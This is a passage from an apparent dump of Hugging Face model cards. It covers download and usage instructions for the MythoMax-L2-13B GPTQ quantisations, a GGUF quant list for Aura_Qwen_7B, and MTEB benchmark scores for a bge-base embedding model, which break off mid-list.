<summary>Explanation of GPTQ parameters</summary>
- Bits: The bit size of the quantised model.
- GS: GPTQ group size. Higher numbers use less VRAM, but have lower quantisation accuracy. "None" is the lowest possible value.
- Act Order: True or False. Also known as `desc_act`. True results in better quantisation accuracy. Some GPTQ clients have had issues with models that use Act Order plus Group Size, but this is generally resolved now.
- Damp %: A GPTQ parameter that affects how samples are processed for quantisation. 0.01 is default, but 0.1 results in slightly better accuracy.
- GPTQ dataset: The dataset used for quantisation. Using a dataset more appropriate to the model's training can improve quantisation accuracy. Note that the GPTQ dataset is not the same as the dataset used to train the model - please refer to the original model repo for details of the training dataset(s).
- Sequence Length: The length of the dataset sequences used for quantisation. Ideally this is the same as the model sequence length. For some very long sequence models (16+K), a lower sequence length may have to be used. Note that a lower sequence length does not limit the sequence length of the quantised model. It only impacts the quantisation accuracy on longer inference sequences.
- ExLlama Compatibility: Whether this file can be loaded with ExLlama, which currently only supports Llama models in 4-bit.
</details>
| Branch | Bits | GS | Act Order | Damp % | GPTQ Dataset | Seq Len | Size | ExLlama | Desc |
| ------ | ---- | -- | --------- | ------ | ------------ | ------- | ---- | ------- | ---- |
| [main](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ/tree/main) | 4 | 128 | No | 0.1 | [wikitext](https://huggingface.co/datasets/wikitext/viewer/wikitext-2-v1/test) | 4096 | 7.26 GB | Yes | 4-bit, without Act Order and group size 128g. |
| [gptq-4bit-32g-actorder_True](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ/tree/gptq-4bit-32g-actorder_True) | 4 | 32 | Yes | 0.1 | [wikitext](https://huggingface.co/datasets/wikitext/viewer/wikitext-2-v1/test) | 4096 | 8.00 GB | Yes | 4-bit, with Act Order and group size 32g. Gives highest possible inference quality, with maximum VRAM usage. |
| [gptq-4bit-64g-actorder_True](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ/tree/gptq-4bit-64g-actorder_True) | 4 | 64 | Yes | 0.1 | [wikitext](https://huggingface.co/datasets/wikitext/viewer/wikitext-2-v1/test) | 4096 | 7.51 GB | Yes | 4-bit, with Act Order and group size 64g. Uses less VRAM than 32g, but with slightly lower accuracy. |
| [gptq-4bit-128g-actorder_True](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ/tree/gptq-4bit-128g-actorder_True) | 4 | 128 | Yes | 0.1 | [wikitext](https://huggingface.co/datasets/wikitext/viewer/wikitext-2-v1/test) | 4096 | 7.26 GB | Yes | 4-bit, with Act Order and group size 128g. Uses even less VRAM than 64g, but with slightly lower accuracy. |
| [gptq-8bit--1g-actorder_True](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ/tree/gptq-8bit--1g-actorder_True) | 8 | None | Yes | 0.1 | [wikitext](https://huggingface.co/datasets/wikitext/viewer/wikitext-2-v1/test) | 4096 | 13.36 GB | No | 8-bit, with Act Order. No group size, to lower VRAM requirements. |
| [gptq-8bit-128g-actorder_True](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ/tree/gptq-8bit-128g-actorder_True) | 8 | 128 | Yes | 0.1 | [wikitext](https://huggingface.co/datasets/wikitext/viewer/wikitext-2-v1/test) | 4096 | 13.65 GB | No | 8-bit, with group size 128g for higher inference quality and with Act Order for even higher accuracy. |
<!-- README_GPTQ.md-provided-files end -->
<!-- README_GPTQ.md-download-from-branches start -->
## How to download from branches
- In text-generation-webui, you can add `:branch` to the end of the download name, eg `TheBloke/MythoMax-L2-13B-GPTQ:main`
- With Git, you can clone a branch with:
```
git clone --single-branch --branch main https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ
```
- In Python Transformers code, the branch is the `revision` parameter; see below.
<!-- README_GPTQ.md-download-from-branches end -->
<!-- README_GPTQ.md-text-generation-webui start -->
## How to easily download and use this model in [text-generation-webui](https://github.com/oobabooga/text-generation-webui).
Please make sure you're using the latest version of [text-generation-webui](https://github.com/oobabooga/text-generation-webui).
It is strongly recommended to use the text-generation-webui one-click-installers unless you're sure you know how to make a manual install.
1. Click the **Model tab**.
2. Under **Download custom model or LoRA**, enter `TheBloke/MythoMax-L2-13B-GPTQ`.
- To download from a specific branch, enter for example `TheBloke/MythoMax-L2-13B-GPTQ:main`
- see Provided Files above for the list of branches for each option.
3. Click **Download**.
4. The model will start downloading. Once it's finished it will say "Done".
5. In the top left, click the refresh icon next to **Model**.
6. In the **Model** dropdown, choose the model you just downloaded: `MythoMax-L2-13B-GPTQ`
7. The model will automatically load, and is now ready for use!
8. If you want any custom settings, set them and then click **Save settings for this model** followed by **Reload the Model** in the top right.
* Note that you do not need to and should not set manual GPTQ parameters any more. These are set automatically from the file `quantize_config.json`.
9. Once you're ready, click the **Text Generation tab** and enter a prompt to get started!
<!-- README_GPTQ.md-text-generation-webui end -->
<!-- README_GPTQ.md-use-from-python start -->
## How to use this GPTQ model from Python code
### Install the necessary packages
Requires: Transformers 4.32.0 or later, Optimum 1.12.0 or later, and AutoGPTQ 0.4.2 or later.
```shell
pip3 install transformers>=4.32.0 optimum>=1.12.0
pip3 install auto-gptq --extra-index-url https://huggingface.github.io/autogptq-index/whl/cu118/ # Use cu117 if on CUDA 11.7
```
If you have problems installing AutoGPTQ using the pre-built wheels, install it from source instead:
```shell
pip3 uninstall -y auto-gptq
git clone https://github.com/PanQiWei/AutoGPTQ
cd AutoGPTQ
pip3 install .
```
### For CodeLlama models only: you must use Transformers 4.33.0 or later.
If 4.33.0 is not yet released when you read this, you will need to install Transformers from source:
```shell
pip3 uninstall -y transformers
pip3 install git+https://github.com/huggingface/transformers.git
```
### You can then use the following code
```python
from transformers import AutoModelForCausalLM, AutoTokenizer, pipeline
model_name_or_path = "TheBloke/MythoMax-L2-13B-GPTQ"
# To use a different branch, change revision
# For example: revision="main"
model = AutoModelForCausalLM.from_pretrained(model_name_or_path,
device_map="auto",
trust_remote_code=False,
revision="main")
tokenizer = AutoTokenizer.from_pretrained(model_name_or_path, use_fast=True)
prompt = "Tell me about AI"
prompt_template=f'''Below is an instruction that describes a task. Write a response that appropriately completes the request.
### Instruction:
{prompt}
### Response:
'''
print("\n\n*** Generate:")
input_ids = tokenizer(prompt_template, return_tensors='pt').input_ids.cuda()
output = model.generate(inputs=input_ids, temperature=0.7, do_sample=True, top_p=0.95, top_k=40, max_new_tokens=512)
print(tokenizer.decode(output[0]))
# Inference can also be done using transformers' pipeline
print("*** Pipeline:")
pipe = pipeline(
"text-generation",
model=model,
tokenizer=tokenizer,
max_new_tokens=512,
do_sample=True,
temperature=0.7,
top_p=0.95,
top_k=40,
repetition_penalty=1.1
)
print(pipe(prompt_template)[0]['generated_text'])
```
<!-- README_GPTQ.md-use-from-python end -->
<!-- README_GPTQ.md-compatibility start -->
## Compatibility
The files provided are tested to work with AutoGPTQ, both via Transformers and using AutoGPTQ directly. They should also work with [Occ4m's GPTQ-for-LLaMa fork](https://github.com/0cc4m/KoboldAI).
[ExLlama](https://github.com/turboderp/exllama) is compatible with Llama models in 4-bit. Please see the Provided Files table above for per-file compatibility.
[Huggingface Text Generation Inference (TGI)](https://github.com/huggingface/text-generation-inference) is compatible with all GPTQ models.
<!-- README_GPTQ.md-compatibility end -->
<!-- footer start -->
<!-- 200823 -->
## Discord
For further support, and discussions on these models and AI in general, join us at:
[TheBloke AI's Discord server](https://discord.gg/theblokeai)
## Thanks, and how to contribute
Thanks to the [chirper.ai](https://chirper.ai) team!
Thanks to Clay from [gpus.llm-utils.org](llm-utils)!
I've had a lot of people ask if they can contribute. I enjoy providing models and helping people, and would love to be able to spend even more time doing it, as well as expanding into new projects like fine tuning/training.
If you're able and willing to contribute it will be most gratefully received and will help me to keep providing more models, and to start work on new AI projects.
Donaters will get priority support on any and all AI/LLM/model questions and requests, access to a private Discord room, plus other benefits.
* Patreon: https://patreon.com/TheBlokeAI
* Ko-Fi: https://ko-fi.com/TheBlokeAI
**Special thanks to**: Aemon Algiz.
**Patreon special mentions**: Alicia Loh, Stephen Murray, K, Ajan Kanaga, RoA, Magnesian, Deo Leter, Olakabola, Eugene Pentland, zynix, Deep Realms, Raymond Fosdick, Elijah Stavena, Iucharbius, Erik Bjäreholt, Luis Javier Navarrete Lozano, Nicholas, theTransient, John Detwiler, alfie_i, knownsqashed, Mano Prime, Willem Michiel, Enrico Ros, LangChain4j, OG, Michael Dempsey, Pierre Kircher, Pedro Madruga, James Bentley, Thomas Belote, Luke @flexchar, Leonard Tan, Johann-Peter Hartmann, Illia Dulskyi, Fen Risland, Chadd, S_X, Jeff Scroggin, Ken Nordquist, Sean Connelly, Artur Olbinski, Swaroop Kallakuri, Jack West, Ai Maven, David Ziegler, Russ Johnson, transmissions 11, John Villwock, Alps Aficionado, Clay Pascal, Viktor Bowallius, Subspace Studios, Rainer Wilmers, Trenton Dambrowitz, vamX, Michael Levine, 준교 김, Brandon Frisco, Kalila, Trailburnt, Randy H, Talal Aujan, Nathan Dryer, Vadim, 阿明, ReadyPlayerEmma, Tiffany J. Kim, George Stoitzev, Spencer Kim, Jerry Meng, Gabriel Tamborski, Cory Kujawski, Jeffrey Morgan, Spiking Neurons AB, Edmond Seymore, Alexandros Triantafyllidis, Lone Striker, Cap'n Zoog, Nikolai Manek, danny, ya boyyy, Derek Yates, usrbinkat, Mandus, TL, Nathan LeClaire, subjectnull, Imad Khwaja, webtim, Raven Klaugh, Asp the Wyvern, Gabriel Puliatti, Caitlyn Gatomon, Joseph William Delisle, Jonathan Leane, Luke Pendergrass, SuperWojo, Sebastain Graf, Will Dee, Fred von Graf, Andrey, Dan Guido, Daniel P. Andersen, Nitin Borwankar, Elle, Vitor Caleffi, biorpg, jjj, NimbleBox.ai, Pieter, Matthew Berman, terasurfer, Michael Davis, Alex, Stanislav Ovsiannikov
Thank you to all my generous patrons and donaters!
And thank you again to a16z for their generous grant.
<!-- footer end -->
# Original model card: Gryphe's MythoMax L2 13B
An improved, potentially even perfected variant of MythoMix, my [MythoLogic-L2](https://huggingface.co/Gryphe/MythoLogic-L2-13b) and [Huginn](https://huggingface.co/The-Face-Of-Goonery/Huginn-13b-FP16) merge using a highly experimental tensor type merge technique. The main difference with MythoMix is that I allowed more of Huginn to intermingle with the single tensors located at the front and end of a model, resulting in increased coherency across the entire structure.
The script and the acccompanying templates I used to produce both can [be found here](https://github.com/Gryphe/BlockMerge_Gradient/tree/main/YAML).
This model is proficient at both roleplaying and storywriting due to its unique nature.
Quantized models are available from TheBloke: [GGML](https://huggingface.co/TheBloke/MythoMax-L2-13B-GGML) - [GPTQ](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ) (You're the best!)
## Model details
The idea behind this merge is that each layer is composed of several tensors, which are in turn responsible for specific functions. Using MythoLogic-L2's robust understanding as its input and Huginn's extensive writing capability as its output seems to have resulted in a model that exceeds at both, confirming my theory. (More details to be released at a later time)
This type of merge is incapable of being illustrated, as each of its 363 tensors had an unique ratio applied to it. As with my prior merges, gradients were part of these ratios to further finetune its behaviour.
## Prompt Format
This model primarily uses Alpaca formatting, so for optimal model performance, use:
```
<System prompt/Character Card>
### Instruction:
Your instruction or question here.
For roleplay purposes, I suggest the following - Write <CHAR NAME>'s next reply in a chat between <YOUR NAME> and <CHAR NAME>. Write a single reply only.
### Response:
```
---
license: other
---
|
Chituyi7/EBO-llama3-8B-4Bit-InstructionTuned-OIG | Chituyi7 | "2024-06-27T09:52:48Z" | 3,608 | 0 | transformers | [
"transformers",
"gguf",
"llama",
"license:mit",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | null | "2024-06-27T08:12:04Z" | ---
license: mit
---
|
mradermacher/Aura_Qwen_7B-GGUF | mradermacher | "2024-06-13T10:28:47Z" | 3,607 | 0 | transformers | [
"transformers",
"gguf",
"mergekit",
"merge",
"en",
"base_model:jeiku/Aura_Qwen_7B",
"endpoints_compatible",
"region:us"
] | null | "2024-06-13T09:40:28Z" | ---
base_model: jeiku/Aura_Qwen_7B
language:
- en
library_name: transformers
quantized_by: mradermacher
tags:
- mergekit
- merge
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/jeiku/Aura_Qwen_7B
<!-- provided-files -->
weighted/imatrix quants are available at https://huggingface.co/mradermacher/Aura_Qwen_7B-i1-GGUF
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q2_K.gguf) | Q2_K | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.IQ3_XS.gguf) | IQ3_XS | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q3_K_S.gguf) | Q3_K_S | 3.6 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.IQ3_S.gguf) | IQ3_S | 3.6 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.IQ3_M.gguf) | IQ3_M | 3.7 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q3_K_M.gguf) | Q3_K_M | 3.9 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q3_K_L.gguf) | Q3_K_L | 4.2 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.IQ4_XS.gguf) | IQ4_XS | 4.4 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q4_K_S.gguf) | Q4_K_S | 4.6 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q4_K_M.gguf) | Q4_K_M | 4.8 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q5_K_S.gguf) | Q5_K_S | 5.4 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q5_K_M.gguf) | Q5_K_M | 5.5 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q6_K.gguf) | Q6_K | 6.4 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q8_0.gguf) | Q8_0 | 8.2 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.f16.gguf) | f16 | 15.3 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
khoa-klaytn/bge-base-en-v1.5-angle | khoa-klaytn | "2024-01-10T03:25:20Z" | 3,604 | 2 | sentence-transformers | [
"sentence-transformers",
"safetensors",
"bert",
"feature-extraction",
"sentence-similarity",
"transformers",
"mteb",
"en",
"arxiv:2310.07554",
"arxiv:2309.07597",
"license:mit",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"text-embeddings-inference",
"region:us"
] | feature-extraction | "2024-01-10T03:25:15Z" | ---
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- transformers
- mteb
model-index:
- name: bge-base-en-v1.5
results:
- task:
type: Classification
dataset:
type: mteb/amazon_counterfactual
name: MTEB AmazonCounterfactualClassification (en)
config: en
split: test
revision: e8379541af4e31359cca9fbcf4b00f2671dba205
metrics:
- type: accuracy
value: 76.14925373134328
- type: ap
value: 39.32336517995478
- type: f1
value: 70.16902252611425
- task:
type: Classification
dataset:
type: mteb/amazon_polarity
name: MTEB AmazonPolarityClassification
config: default
split: test
revision: e2d317d38cd51312af73b3d32a06d1a08b442046
metrics:
- type: accuracy
value: 93.386825
- type: ap
value: 90.21276917991995
- type: f1
value: 93.37741030006174
- task:
type: Classification
dataset:
type: mteb/amazon_reviews_multi
name: MTEB AmazonReviewsClassification (en)
config: en
split: test
revision: 1399c76144fd37290681b995c656ef9b2e06e26d
metrics:
- type: accuracy
value: 48.846000000000004
- type: f1
value: 48.14646269778261
- task:
type: Retrieval
dataset:
type: arguana
name: MTEB ArguAna
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 40.754000000000005
- type: map_at_10
value: 55.761
- type: map_at_100
value: 56.330999999999996
- type: map_at_1000
value: 56.333999999999996
- type: map_at_3
value: 51.92
- type: map_at_5
value: 54.010999999999996
- type: mrr_at_1
value: 41.181
- type: mrr_at_10
value: 55.967999999999996
- type: mrr_at_100
value: 56.538
- type: mrr_at_1000
value: 56.542
- type: mrr_at_3
value: 51.980000000000004
- type: mrr_at_5
value: 54.208999999999996
- type: ndcg_at_1
value: 40.754000000000005
- type: ndcg_at_10
value: 63.605000000000004
- type: ndcg_at_100
value: 66.05199999999999
- type: ndcg_at_1000
value: 66.12
- type: ndcg_at_3
value: 55.708
- type: ndcg_at_5
value: 59.452000000000005
- type: precision_at_1
value: 40.754000000000005
- type: precision_at_10
value: 8.841000000000001
- type: precision_at_100
value: 0.991
- type: precision_at_1000
value: 0.1
- type: precision_at_3
value: 22.238
- type: precision_at_5
value: 15.149000000000001
- type: recall_at_1
value: 40.754000000000005
- type: recall_at_10
value: 88.407
- type: recall_at_100
value: 99.14699999999999
- type: recall_at_1000
value: 99.644
- type: recall_at_3
value: 66.714
- type: recall_at_5
value: 75.747
- task:
type: Clustering
dataset:
type: mteb/arxiv-clustering-p2p
name: MTEB ArxivClusteringP2P
config: default
split: test
revision: a122ad7f3f0291bf49cc6f4d32aa80929df69d5d
metrics:
- type: v_measure
value: 48.74884539679369
- task:
type: Clustering
dataset:
type: mteb/arxiv-clustering-s2s
name: MTEB ArxivClusteringS2S
config: default
split: test
revision: f910caf1a6075f7329cdf8c1a6135696f37dbd53
metrics:
- type: v_measure
value: 42.8075893810716
- task:
type: Reranking
dataset:
type: mteb/askubuntudupquestions-reranking
name: MTEB AskUbuntuDupQuestions
config: default
split: test
revision: 2000358ca161889fa9c082cb41daa8dcfb161a54
metrics:
- type: map
value: 62.128470519187736
- type: mrr
value: 74.28065778481289
- task:
type: STS
dataset:
type: mteb/biosses-sts
name: MTEB BIOSSES
config: default
split: test
revision: d3fb88f8f02e40887cd149695127462bbcf29b4a
metrics:
- type: cos_sim_pearson
value: 89.24629081484655
- type: cos_sim_spearman
value: 86.93752309911496
- type: euclidean_pearson
value: 87.58589628573816
- type: euclidean_spearman
value: 88.05622328825284
- type: manhattan_pearson
value: 87.5594959805773
- type: manhattan_spearman
value: 88.19658793233961
- task:
type: Classification
dataset:
type: mteb/banking77
name: MTEB Banking77Classification
config: default
split: test
revision: 0fd18e25b25c072e09e0d92ab615fda904d66300
metrics:
- type: accuracy
value: 86.9512987012987
- type: f1
value: 86.92515357973708
- task:
type: Clustering
dataset:
type: mteb/biorxiv-clustering-p2p
name: MTEB BiorxivClusteringP2P
config: default
split: test
revision: 65b79d1d13f80053f67aca9498d9402c2d9f1f40
metrics:
- type: v_measure
value: 39.10263762928872
- task:
type: Clustering
dataset:
type: mteb/biorxiv-clustering-s2s
name: MTEB BiorxivClusteringS2S
config: default
split: test
revision: 258694dd0231531bc1fd9de6ceb52a0853c6d908
metrics:
- type: v_measure
value: 36.69711517426737
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackAndroidRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 32.327
- type: map_at_10
value: 44.099
- type: map_at_100
value: 45.525
- type: map_at_1000
value: 45.641999999999996
- type: map_at_3
value: 40.47
- type: map_at_5
value: 42.36
- type: mrr_at_1
value: 39.199
- type: mrr_at_10
value: 49.651
- type: mrr_at_100
value: 50.29
- type: mrr_at_1000
value: 50.329
- type: mrr_at_3
value: 46.924
- type: mrr_at_5
value: 48.548
- type: ndcg_at_1
value: 39.199
- type: ndcg_at_10
value: 50.773
- type: ndcg_at_100
value: 55.67999999999999
- type: ndcg_at_1000
value: 57.495
- type: ndcg_at_3
value: 45.513999999999996
- type: ndcg_at_5
value: 47.703
- type: precision_at_1
value: 39.199
- type: precision_at_10
value: 9.914000000000001
- type: precision_at_100
value: 1.5310000000000001
- type: precision_at_1000
value: 0.198
- type: precision_at_3
value: 21.984
- type: precision_at_5
value: 15.737000000000002
- type: recall_at_1
value: 32.327
- type: recall_at_10
value: 63.743
- type: recall_at_100
value: 84.538
- type: recall_at_1000
value: 96.089
- type: recall_at_3
value: 48.065000000000005
- type: recall_at_5
value: 54.519
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackEnglishRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 32.671
- type: map_at_10
value: 42.954
- type: map_at_100
value: 44.151
- type: map_at_1000
value: 44.287
- type: map_at_3
value: 39.912
- type: map_at_5
value: 41.798
- type: mrr_at_1
value: 41.465
- type: mrr_at_10
value: 49.351
- type: mrr_at_100
value: 49.980000000000004
- type: mrr_at_1000
value: 50.016000000000005
- type: mrr_at_3
value: 47.144000000000005
- type: mrr_at_5
value: 48.592999999999996
- type: ndcg_at_1
value: 41.465
- type: ndcg_at_10
value: 48.565999999999995
- type: ndcg_at_100
value: 52.76499999999999
- type: ndcg_at_1000
value: 54.749
- type: ndcg_at_3
value: 44.57
- type: ndcg_at_5
value: 46.759
- type: precision_at_1
value: 41.465
- type: precision_at_10
value: 9.107999999999999
- type: precision_at_100
value: 1.433
- type: precision_at_1000
value: 0.191
- type: precision_at_3
value: 21.423000000000002
- type: precision_at_5
value: 15.414
- type: recall_at_1
value: 32.671
- type: recall_at_10
value: 57.738
- type: recall_at_100
value: 75.86500000000001
- type: recall_at_1000
value: 88.36
- type: recall_at_3
value: 45.626
- type: recall_at_5
value: 51.812000000000005
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackGamingRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 41.185
- type: map_at_10
value: 53.929
- type: map_at_100
value: 54.92
- type: map_at_1000
value: 54.967999999999996
- type: map_at_3
value: 50.70400000000001
- type: map_at_5
value: 52.673
- type: mrr_at_1
value: 47.398
- type: mrr_at_10
value: 57.303000000000004
- type: mrr_at_100
value: 57.959
- type: mrr_at_1000
value: 57.985
- type: mrr_at_3
value: 54.932
- type: mrr_at_5
value: 56.464999999999996
- type: ndcg_at_1
value: 47.398
- type: ndcg_at_10
value: 59.653
- type: ndcg_at_100
value: 63.627
- type: ndcg_at_1000
value: 64.596
- type: ndcg_at_3
value: 54.455
- type: ndcg_at_5
value: 57.245000000000005
- type: precision_at_1
value: 47.398
- type: precision_at_10
value: 9.524000000000001
- type: precision_at_100
value: 1.243
- type: precision_at_1000
value: 0.13699999999999998
- type: precision_at_3
value: 24.389
- type: precision_at_5
value: 16.752
- type: recall_at_1
value: 41.185
- type: recall_at_10
value: 73.193
- type: recall_at_100
value: 90.357
- type: recall_at_1000
value: 97.253
- type: recall_at_3
value: 59.199999999999996
- type: recall_at_5
value: 66.118
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackGisRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 27.27
- type: map_at_10
value: 36.223
- type: map_at_100
value: 37.218
- type: map_at_1000
value: 37.293
- type: map_at_3
value: 33.503
- type: map_at_5
value: 35.097
- type: mrr_at_1
value: 29.492
- type: mrr_at_10
value: 38.352000000000004
- type: mrr_at_100
value: 39.188
- type: mrr_at_1000
value: 39.247
- type: mrr_at_3
value: 35.876000000000005
- type: mrr_at_5
value: 37.401
- type: ndcg_at_1
value: 29.492
- type: ndcg_at_10
value: 41.239
- type: ndcg_at_100
value: 46.066
- type: ndcg_at_1000
value: 47.992000000000004
- type: ndcg_at_3
value: 36.11
- type: ndcg_at_5
value: 38.772
- type: precision_at_1
value: 29.492
- type: precision_at_10
value: 6.260000000000001
- type: precision_at_100
value: 0.914
- type: precision_at_1000
value: 0.11100000000000002
- type: precision_at_3
value: 15.104000000000001
- type: precision_at_5
value: 10.644
- type: recall_at_1
value: 27.27
- type: recall_at_10
value: 54.589
- type: recall_at_100
value: 76.70700000000001
- type: recall_at_1000
value: 91.158
- type: recall_at_3
value: 40.974
- type: recall_at_5
value: 47.327000000000005
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackMathematicaRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 17.848
- type: map_at_10
value: 26.207
- type: map_at_100
value: 27.478
- type: map_at_1000
value: 27.602
- type: map_at_3
value: 23.405
- type: map_at_5
value: 24.98
- type: mrr_at_1
value: 21.891
- type: mrr_at_10
value: 31.041999999999998
- type: mrr_at_100
value: 32.092
- type: mrr_at_1000
value: 32.151999999999994
- type: mrr_at_3
value: 28.358
- type: mrr_at_5
value: 29.969
- type: ndcg_at_1
value: 21.891
- type: ndcg_at_10
value: 31.585
- type: ndcg_at_100
value: 37.531
- type: ndcg_at_1000
value: 40.256
- type: ndcg_at_3
value: 26.508
- type: ndcg_at_5
value: 28.894
- type: precision_at_1
value: 21.891
- type: precision_at_10
value: 5.795999999999999
- type: precision_at_100
value: 0.9990000000000001
- type: precision_at_1000
value: 0.13799999999999998
- type: precision_at_3
value: 12.769
- type: precision_at_5
value: 9.279
- type: recall_at_1
value: 17.848
- type: recall_at_10
value: 43.452
- type: recall_at_100
value: 69.216
- type: recall_at_1000
value: 88.102
- type: recall_at_3
value: 29.18
- type: recall_at_5
value: 35.347
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackPhysicsRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 30.94
- type: map_at_10
value: 41.248000000000005
- type: map_at_100
value: 42.495
- type: map_at_1000
value: 42.602000000000004
- type: map_at_3
value: 37.939
- type: map_at_5
value: 39.924
- type: mrr_at_1
value: 37.824999999999996
- type: mrr_at_10
value: 47.041
- type: mrr_at_100
value: 47.83
- type: mrr_at_1000
value: 47.878
- type: mrr_at_3
value: 44.466
- type: mrr_at_5
value: 46.111999999999995
- type: ndcg_at_1
value: 37.824999999999996
- type: ndcg_at_10
value: 47.223
- type: ndcg_at_100
value: 52.394
- type: ndcg_at_1000
value: 54.432
- type: ndcg_at_3
value: 42.032000000000004
- type: ndcg_at_5
value: 44.772
- type: precision_at_1
value: 37.824999999999996
- type: precision_at_10
value: 8.393
- type: precision_at_100
value: 1.2890000000000001
- type: precision_at_1000
value: 0.164
- type: precision_at_3
value: 19.698
- type: precision_at_5
value: 14.013
- type: recall_at_1
value: 30.94
- type: recall_at_10
value: 59.316
- type: recall_at_100
value: 80.783
- type: recall_at_1000
value: 94.15400000000001
- type: recall_at_3
value: 44.712
- type: recall_at_5
value: 51.932
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackProgrammersRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 27.104
- type: map_at_10
value: 36.675999999999995
- type: map_at_100
value: 38.076
- type: map_at_1000
value: 38.189
- type: map_at_3
value: 33.733999999999995
- type: map_at_5
value: 35.287
- type: mrr_at_1
value: 33.904
- type: mrr_at_10
value: 42.55
- type: mrr_at_100
value: 43.434
- type: mrr_at_1000
value: 43.494
- type: mrr_at_3
value: 40.126
- type: mrr_at_5
value: 41.473
- type: ndcg_at_1
value: 33.904
- type: ndcg_at_10
value: 42.414
- type: ndcg_at_100
value: 48.203
- type: ndcg_at_1000
value: 50.437
- type: ndcg_at_3
value: 37.633
- type: ndcg_at_5
value: 39.67
- type: precision_at_1
value: 33.904
- type: precision_at_10
value: 7.82
- type: precision_at_100
value: 1.2409999999999999
- type: precision_at_1000
value: 0.159
- type: precision_at_3
value: 17.884
- type: precision_at_5
value: 12.648000000000001
- type: recall_at_1
value: 27.104
- type: recall_at_10
value: 53.563
- type: recall_at_100
value: 78.557
- type: recall_at_1000
value: 93.533
- type: recall_at_3
value: 39.92
- type: recall_at_5
value: 45.457
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 27.707749999999997
- type: map_at_10
value: 36.961
- type: map_at_100
value: 38.158833333333334
- type: map_at_1000
value: 38.270333333333326
- type: map_at_3
value: 34.07183333333334
- type: map_at_5
value: 35.69533333333334
- type: mrr_at_1
value: 32.81875
- type: mrr_at_10
value: 41.293
- type: mrr_at_100
value: 42.116499999999995
- type: mrr_at_1000
value: 42.170249999999996
- type: mrr_at_3
value: 38.83983333333333
- type: mrr_at_5
value: 40.29775
- type: ndcg_at_1
value: 32.81875
- type: ndcg_at_10
value: 42.355
- type: ndcg_at_100
